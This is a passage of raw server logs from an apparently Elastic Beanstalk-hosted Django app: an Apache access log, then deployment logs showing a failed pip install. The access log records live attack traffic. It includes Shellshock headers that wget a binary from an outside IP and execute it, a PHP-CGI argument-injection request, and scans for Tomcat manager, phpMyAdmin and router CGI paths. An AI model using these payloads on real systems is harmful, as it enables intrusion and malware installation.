  220. 31.192.108.62 (-) - - [18/Jul/2015:14:15:47 +0000] "POST /cgi-bin/php/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1" 404 210 "-" "python-requests/2.5.3 CPython/2.6.6 Linux/2.6.32-504.16.2.el6.x86_64"
  221. ::1 (-) - - [18/Jul/2015:14:15:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 (internal dummy connection)"
  222. ::1 (-) - - [18/Jul/2015:14:15:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 (internal dummy connection)"
  223. ::1 (-) - - [18/Jul/2015:14:15:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.12 (Amazon) mod_wsgi/3.5 Python/2.7.9 (internal dummy connection)"
  224. 54.224.83.111 (-) - - [18/Jul/2015:17:14:49 +0000] "HEAD / HTTP/1.1" 500 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  225. 192.187.110.98 (-) - - [18/Jul/2015:20:27:29 +0000] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 500 125094 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  226. 141.212.122.18 (-) - - [19/Jul/2015:00:57:34 +0000] "GET /x HTTP/1.1" 400 226 "-" "Telesphoreo"
  227. 77.247.140.128 (-) - - [19/Jul/2015:06:43:50 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 226 "-" "-"
  228. 77.247.140.128 (-) - - [19/Jul/2015:06:43:54 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
  229. 54.159.114.10 (-) - - [19/Jul/2015:09:00:49 +0000] "HEAD / HTTP/1.1" 500 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  230. 141.212.122.2 (-) - - [19/Jul/2015:10:25:14 +0000] "GET /x HTTP/1.1" 400 226 "-" "Telesphoreo"
  231. 141.212.122.50 (-) - - [19/Jul/2015:14:32:50 +0000] "CONNECT google.com:443 HTTP/1.1" 500 108869 "-" "-"
  232. 91.196.48.92 (-) - - [19/Jul/2015:20:59:25 +0000] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 500 125088 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  233. 222.186.21.41 (-) - - [19/Jul/2015:21:54:27 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  234. 222.186.21.41 (-) - - [19/Jul/2015:21:54:32 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  235. 222.186.21.41 (-) - - [19/Jul/2015:21:54:33 +0000] "GET /manager/html HTTP/1.1" 500 124267 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  236. 222.186.21.41 (-) - - [19/Jul/2015:21:54:35 +0000] "GET /manager/html HTTP/1.1" 500 124291 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  237. 222.186.21.41 (-) - - [19/Jul/2015:21:54:36 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  238. 222.186.21.41 (-) - - [19/Jul/2015:21:54:48 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  239. 222.186.21.41 (-) - - [19/Jul/2015:21:54:49 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  240. 222.186.21.41 (-) - - [19/Jul/2015:21:55:02 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  241. 222.186.21.41 (-) - - [19/Jul/2015:21:55:04 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  242. 222.186.21.41 (-) - - [19/Jul/2015:21:55:05 +0000] "GET /manager/html HTTP/1.1" 500 124291 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  243. 222.186.21.41 (-) - - [19/Jul/2015:21:55:06 +0000] "GET /manager/html HTTP/1.1" 500 124279 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  244. 222.186.21.41 (-) - - [19/Jul/2015:21:55:26 +0000] "GET /manager/html HTTP/1.1" 500 124291 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  245. 222.186.21.41 (-) - - [19/Jul/2015:21:55:33 +0000] "GET /manager/html HTTP/1.1" 500 124291 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  246. 54.80.128.131 (-) - - [19/Jul/2015:22:59:22 +0000] "HEAD / HTTP/1.1" 500 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  247. 182.118.53.60 (-) - - [20/Jul/2015:05:05:39 +0000] "GET / HTTP/1.1" 500 109415 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36"
  248. 182.118.54.82 (-) - - [20/Jul/2015:05:40:01 +0000] "GET / HTTP/1.1" 500 109415 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36"
  249. 178.19.104.138 (-) - - [20/Jul/2015:10:00:21 +0000] "GET / HTTP/1.1" 500 109023 "-" "-"
  250. 178.19.104.138 (-) - - [20/Jul/2015:10:00:21 +0000] "GET /robots.txt HTTP/1.1" 500 123542 "-" "-"
  251. 178.19.104.138 (-) - - [20/Jul/2015:10:00:22 +0000] "GET /sitemap.xml HTTP/1.1" 500 123565 "-" "-"
  252. 54.161.2.222 (-) - - [20/Jul/2015:14:55:54 +0000] "HEAD / HTTP/1.1" 500 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  253. 104.192.0.20 (-) - - [20/Jul/2015:17:16:50 +0000] "-" 408 - "-" "-"
  254. 182.118.55.212 (-) - - [20/Jul/2015:17:22:53 +0000] "GET / HTTP/1.1" 500 109417 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36"
  255. 187.112.67.128 (-) - - [20/Jul/2015:17:55:10 +0000] "OPTIONS /api-token-auth/ HTTP/1.1" 200 - "http://localhost:8000/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  256. 187.112.67.128 (-) - - [20/Jul/2015:17:55:10 +0000] "POST /api-token-auth/ HTTP/1.1" 500 111190 "http://localhost:8000/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
  257. 207.244.74.111 (-) - - [20/Jul/2015:21:50:59 +0000] "\x16\x03\x01" 400 226 "-" "-"
  258. 122.0.78.91 (-) - - [20/Jul/2015:21:58:20 +0000] "GET / HTTP/1.1" 500 111067 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://211.147.2.192:999/2.6 -O /tmp/China.Z-cqts >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-cqts >> /tmp/Run.sh;echo /tmp/China.Z-cqts >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://211.147.2.192:999/2.6 -O /tmp/China.Z-cqts >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-cqts >> /tmp/Run.sh;echo /tmp/China.Z-cqts >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
  259. 125.88.11.103 (-) - - [20/Jul/2015:22:12:40 +0000] "GET / HTTP/1.1" 500 111061 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://211.147.2.192:999/2.6 -O /tmp/China.Z-zjcm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-zjcm >> /tmp/Run.sh;echo /tmp/China.Z-zjcm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://211.147.2.192:999/2.6 -O /tmp/China.Z-zjcm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-zjcm >> /tmp/Run.sh;echo /tmp/China.Z-zjcm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
  260. 185.25.151.159 (-) - - [21/Jul/2015:01:11:51 +0000] "GET http://testp1.piwo.pila.pl/testproxy.php HTTP/1.1" 500 125094 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  261. 54.81.127.25 (-) - - [21/Jul/2015:06:55:29 +0000] "HEAD / HTTP/1.1" 500 - "-" "Cloud mapping experiment. Contact research@pdrlabs.net"
  262. 207.244.74.111 (-) - - [21/Jul/2015:08:21:43 +0000] "GET /themes/elastixneo/ie.css HTTP/1.1" 500 124725 "-" "python-requests/2.7.0 CPython/2.6.6 Linux/2.6.32-504.23.4.el6.x86_64"
  263. 60.50.253.102 (-) - - [21/Jul/2015:10:41:20 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 226 "-" "-"
  264. 60.50.253.102 (-) - - [21/Jul/2015:10:41:24 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
  265. 54.159.154.209 (-) - - [21/Jul/2015:10:41:26 +0000] "GET / HTTP/1.1" 500 109487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
  266. 141.212.121.128 (-) - - [21/Jul/2015:12:18:22 +0000] "GET / HTTP/1.1" 500 108835 "-" "-"
  267. 209.126.230.71 (-) - - [21/Jul/2015:13:05:50 +0000] "GET / HTTP/1.0" 500 109059 "-" "StatsInfo"
  268. 185.25.151.159 (-) - - [21/Jul/2015:16:38:06 +0000] "GET http://testp5.mielno.lubin.pl/testproxy.php HTTP/1.1" 500 125136 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  269. 91.196.48.92 (-) - - [21/Jul/2015:17:56:17 +0000] "GET http://testp2.czar.bielawa.pl/testproxy.php HTTP/1.1" 500 125130 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
  270. 188.209.49.50 (-) - - [21/Jul/2015:18:44:45 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 500 124585 "-" "Mozilla/5.0 (Windows NT 5.1)"
  271.  
  272.  
  273.  
  274. -------------------------------------
  275. /var/log/eb-activity.log
  276. -------------------------------------
  277. inflating: /opt/python/ondeck/app/upload/views.py
  278. inflating: /opt/python/ondeck/app/upload/views.pyc
  279. creating: /opt/python/ondeck/app/utils/
  280. extracting: /opt/python/ondeck/app/utils/__init__.py
  281. inflating: /opt/python/ondeck/app/utils/__init__.pyc
  282. inflating: /opt/python/ondeck/app/utils/amazon_sender.py
  283. inflating: /opt/python/ondeck/app/utils/botoUtils.py
  284. inflating: /opt/python/ondeck/app/utils/consumerEventManager.py
  285. inflating: /opt/python/ondeck/app/utils/consumerEventManager.pyc
  286. inflating: /opt/python/ondeck/app/utils/couponManager.py
  287. inflating: /opt/python/ondeck/app/utils/couponManager.pyc
  288. inflating: /opt/python/ondeck/app/utils/db.py
  289. inflating: /opt/python/ondeck/app/utils/db.pyc
  290. inflating: /opt/python/ondeck/app/utils/imageUtils.py
  291. inflating: /opt/python/ondeck/app/utils/notification.py
  292. inflating: /opt/python/ondeck/app/utils/notification.pyc
  293. inflating: /opt/python/ondeck/app/utils/productManager.py
  294. inflating: /opt/python/ondeck/app/utils/productManager.pyc
  295. inflating: /opt/python/ondeck/app/utils/promotionManager.py
  296. inflating: /opt/python/ondeck/app/utils/promotionManager.pyc
  297. inflating: /opt/python/ondeck/app/utils/promotionrule.py
  298. inflating: /opt/python/ondeck/app/utils/promotionrule.pyc
  299. inflating: /opt/python/ondeck/app/utils/receiptManager.py
  300. inflating: /opt/python/ondeck/app/utils/receiptManager.pyc
  301. inflating: /opt/python/ondeck/app/utils/register_login.py
  302. inflating: /opt/python/ondeck/app/utils/register_login.pyc
  303. inflating: /opt/python/ondeck/app/utils/signals.py
  304. inflating: /opt/python/ondeck/app/utils/socialauth.py
  305. inflating: /opt/python/ondeck/app/utils/socialauth.pyc
  306. creating: /opt/python/ondeck/app/.ebextensions/
  307. inflating: /opt/python/ondeck/app/.ebextensions/dashboard.config
  308. [2015-07-21T19:37:21.242Z] INFO [29493] - [CMD-AppDeploy/AppDeployStage0/AppDeployPreHook/03deploy.py] : Starting activity...
  309. [2015-07-21T19:37:21.735Z] INFO [29493] - [CMD-AppDeploy/AppDeployStage0/AppDeployPreHook/03deploy.py] : Activity execution failed, because: You are using pip version 7.0.3, however version 7.1.0 is available.
  310. You should consider upgrading via the 'pip install --upgrade pip' command.
  311. Requirement already satisfied (use --upgrade to upgrade): Django==1.8.1 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 1))
  312. Requirement already satisfied (use --upgrade to upgrade): Markdown==2.6 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 2))
  313. Requirement already satisfied (use --upgrade to upgrade): MySQL-python==1.2.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 3))
  314. Requirement already satisfied (use --upgrade to upgrade): Pillow==2.7.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 4))
  315. Requirement already satisfied (use --upgrade to upgrade): PyYAML==3.11 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 5))
  316. Requirement already satisfied (use --upgrade to upgrade): boto==2.36.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 6))
  317. Requirement already satisfied (use --upgrade to upgrade): django-cors-headers==1.0.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 7))
  318. Requirement already satisfied (use --upgrade to upgrade): django-filter==0.9.2 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 8))
  319. Requirement already satisfied (use --upgrade to upgrade): django-rest-auth==0.3.4 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 9))
  320. Requirement already satisfied (use --upgrade to upgrade): django-rest-swagger==0.2.8 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 10))
  321. Requirement already satisfied (use --upgrade to upgrade): djangorestframework==3.0.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 11))
  322. Requirement already satisfied (use --upgrade to upgrade): six==1.9.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 12))
  323. Requirement already satisfied (use --upgrade to upgrade): wsgiref==0.1.2 in /usr/lib64/python2.7 (from -r /opt/python/ondeck/app/requirements.txt (line 13))
  324. Obtaining google-visualization-python from git+https://github.com/google/google-visualization-python#egg=google-visualization-python (from -r /opt/python/ondeck/app/requirements.txt (line 14))
  325. Cloning https://github.com/google/google-visualization-python to /opt/python/run/venv/src/google-visualization-python
  326. Error [Errno 2] No such file or directory while executing command git clone -q https://github.com/google/google-visualization-python /opt/python/run/venv/src/google-visualization-python
  327. Cannot find command 'git'
  328. 2015-07-21 19:37:21,730 ERROR Error installing dependencies: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1
  329. Traceback (most recent call last):
  330. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 22, in main
  331. install_dependencies()
  332. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 18, in install_dependencies
  333. check_call('%s install -r %s' % (os.path.join(APP_VIRTUAL_ENV, 'bin', 'pip'), requirements_file), shell=True)
  334. File "/usr/lib64/python2.7/subprocess.py", line 540, in check_call
  335. raise CalledProcessError(retcode, cmd)
  336. CalledProcessError: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1 (ElasticBeanstalk::ExternalInvocationError)
  337. caused by: You are using pip version 7.0.3, however version 7.1.0 is available.
  338. You should consider upgrading via the 'pip install --upgrade pip' command.
  339. Requirement already satisfied (use --upgrade to upgrade): Django==1.8.1 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 1))
  340. Requirement already satisfied (use --upgrade to upgrade): Markdown==2.6 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 2))
  341. Requirement already satisfied (use --upgrade to upgrade): MySQL-python==1.2.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 3))
  342. Requirement already satisfied (use --upgrade to upgrade): Pillow==2.7.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 4))
  343. Requirement already satisfied (use --upgrade to upgrade): PyYAML==3.11 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 5))
  344. Requirement already satisfied (use --upgrade to upgrade): boto==2.36.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 6))
  345. Requirement already satisfied (use --upgrade to upgrade): django-cors-headers==1.0.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 7))
  346. Requirement already satisfied (use --upgrade to upgrade): django-filter==0.9.2 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 8))
  347. Requirement already satisfied (use --upgrade to upgrade): django-rest-auth==0.3.4 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 9))
  348. Requirement already satisfied (use --upgrade to upgrade): django-rest-swagger==0.2.8 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 10))
  349. Requirement already satisfied (use --upgrade to upgrade): djangorestframework==3.0.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 11))
  350. Requirement already satisfied (use --upgrade to upgrade): six==1.9.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 12))
  351. Requirement already satisfied (use --upgrade to upgrade): wsgiref==0.1.2 in /usr/lib64/python2.7 (from -r /opt/python/ondeck/app/requirements.txt (line 13))
  352. Obtaining google-visualization-python from git+https://github.com/google/google-visualization-python#egg=google-visualization-python (from -r /opt/python/ondeck/app/requirements.txt (line 14))
  353. Cloning https://github.com/google/google-visualization-python to /opt/python/run/venv/src/google-visualization-python
  354. Error [Errno 2] No such file or directory while executing command git clone -q https://github.com/google/google-visualization-python /opt/python/run/venv/src/google-visualization-python
  355. Cannot find command 'git'
  356. 2015-07-21 19:37:21,730 ERROR Error installing dependencies: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1
  357. Traceback (most recent call last):
  358. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 22, in main
  359. install_dependencies()
  360. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 18, in install_dependencies
  361. check_call('%s install -r %s' % (os.path.join(APP_VIRTUAL_ENV, 'bin', 'pip'), requirements_file), shell=True)
  362. File "/usr/lib64/python2.7/subprocess.py", line 540, in check_call
  363. raise CalledProcessError(retcode, cmd)
  364. CalledProcessError: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1 (Executor::NonZeroExitStatus)
  365.  
  366.  
  367. [2015-07-21T19:37:21.736Z] INFO [29493] - [CMD-AppDeploy/AppDeployStage0/AppDeployPreHook/03deploy.py] : Activity failed.
  368. [2015-07-21T19:37:21.736Z] INFO [29493] - [CMD-AppDeploy/AppDeployStage0/AppDeployPreHook] : Activity failed.
  369. [2015-07-21T19:37:21.736Z] INFO [29493] - [CMD-AppDeploy/AppDeployStage0] : Activity failed.
  370. [2015-07-21T19:37:21.736Z] INFO [29493] - [CMD-AppDeploy] : Completed activity. Result:
  371. Command CMD-AppDeploy failed.
  372. [2015-07-21T19:41:53.543Z] INFO [29621] - [CMD-TailLogs] : Starting activity...
  373. [2015-07-21T19:41:53.769Z] INFO [29621] - [CMD-TailLogs/AddonsBefore] : Starting activity...
  374. [2015-07-21T19:41:53.769Z] INFO [29621] - [CMD-TailLogs/AddonsBefore] : Completed activity.
  375. [2015-07-21T19:41:53.769Z] INFO [29621] - [CMD-TailLogs/TailLogs] : Starting activity...
  376. [2015-07-21T19:41:53.769Z] INFO [29621] - [CMD-TailLogs/TailLogs/TailLogs] : Starting activity...
  377.  
  378.  
  379.  
  380. -------------------------------------
  381. /var/log/eb-commandprocessor.log
  382. -------------------------------------
  383. [2015-07-21T19:37:19.393Z] DEBUG [29493] : Setting environment variables..
  384. [2015-07-21T19:37:19.393Z] INFO [29493] : Running AddonsBefore for command CMD-AppDeploy...
  385. [2015-07-21T19:37:19.393Z] DEBUG [29493] : Running stages of Command CMD-AppDeploy from stage 0 to stage 1...
  386. [2015-07-21T19:37:19.393Z] INFO [29493] : Running stage 0 of command CMD-AppDeploy...
  387. [2015-07-21T19:37:19.393Z] INFO [29493] : Running leader election...
  388. [2015-07-21T19:37:19.660Z] INFO [29493] : Instance is Leader.
  389. [2015-07-21T19:37:19.660Z] DEBUG [29493] : Loaded 7 actions for stage 0.
  390. [2015-07-21T19:37:19.660Z] INFO [29493] : Running 1 of 7 actions: InfraWriteConfig...
  391. [2015-07-21T19:37:19.663Z] INFO [29493] : Running 2 of 7 actions: InfraWriteApp1...
  392. [2015-07-21T19:37:19.663Z] INFO [29493] : Running 3 of 7 actions: InfraWriteApp2...
  393. [2015-07-21T19:37:20.279Z] INFO [29493] : Running 4 of 7 actions: EbExtensionPreBuild...
  394. [2015-07-21T19:37:20.594Z] INFO [29493] : Running 5 of 7 actions: AppDeployPreHook...
  395. [2015-07-21T19:37:21.736Z] ERROR [29493] : Command execution failed: Activity failed. (ElasticBeanstalk::ActivityFatalError)
  396. caused by: You are using pip version 7.0.3, however version 7.1.0 is available.
  397. You should consider upgrading via the 'pip install --upgrade pip' command.
  398. Requirement already satisfied (use --upgrade to upgrade): Django==1.8.1 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 1))
  399. Requirement already satisfied (use --upgrade to upgrade): Markdown==2.6 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 2))
  400. Requirement already satisfied (use --upgrade to upgrade): MySQL-python==1.2.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 3))
  401. Requirement already satisfied (use --upgrade to upgrade): Pillow==2.7.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 4))
  402. Requirement already satisfied (use --upgrade to upgrade): PyYAML==3.11 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 5))
  403. Requirement already satisfied (use --upgrade to upgrade): boto==2.36.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 6))
  404. Requirement already satisfied (use --upgrade to upgrade): django-cors-headers==1.0.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 7))
  405. Requirement already satisfied (use --upgrade to upgrade): django-filter==0.9.2 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 8))
  406. Requirement already satisfied (use --upgrade to upgrade): django-rest-auth==0.3.4 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 9))
  407. Requirement already satisfied (use --upgrade to upgrade): django-rest-swagger==0.2.8 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 10))
  408. Requirement already satisfied (use --upgrade to upgrade): djangorestframework==3.0.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 11))
  409. Requirement already satisfied (use --upgrade to upgrade): six==1.9.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 12))
  410. Requirement already satisfied (use --upgrade to upgrade): wsgiref==0.1.2 in /usr/lib64/python2.7 (from -r /opt/python/ondeck/app/requirements.txt (line 13))
  411. Obtaining google-visualization-python from git+https://github.com/google/google-visualization-python#egg=google-visualization-python (from -r /opt/python/ondeck/app/requirements.txt (line 14))
  412. Cloning https://github.com/google/google-visualization-python to /opt/python/run/venv/src/google-visualization-python
  413. Error [Errno 2] No such file or directory while executing command git clone -q https://github.com/google/google-visualization-python /opt/python/run/venv/src/google-visualization-python
  414. Cannot find command 'git'
  415. 2015-07-21 19:37:21,730 ERROR Error installing dependencies: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1
  416. Traceback (most recent call last):
  417. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 22, in main
  418. install_dependencies()
  419. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 18, in install_dependencies
  420. check_call('%s install -r %s' % (os.path.join(APP_VIRTUAL_ENV, 'bin', 'pip'), requirements_file), shell=True)
  421. File "/usr/lib64/python2.7/subprocess.py", line 540, in check_call
  422. raise CalledProcessError(retcode, cmd)
  423. CalledProcessError: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1 (ElasticBeanstalk::ExternalInvocationError)
  424. caused by: You are using pip version 7.0.3, however version 7.1.0 is available.
  425. You should consider upgrading via the 'pip install --upgrade pip' command.
  426. Requirement already satisfied (use --upgrade to upgrade): Django==1.8.1 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 1))
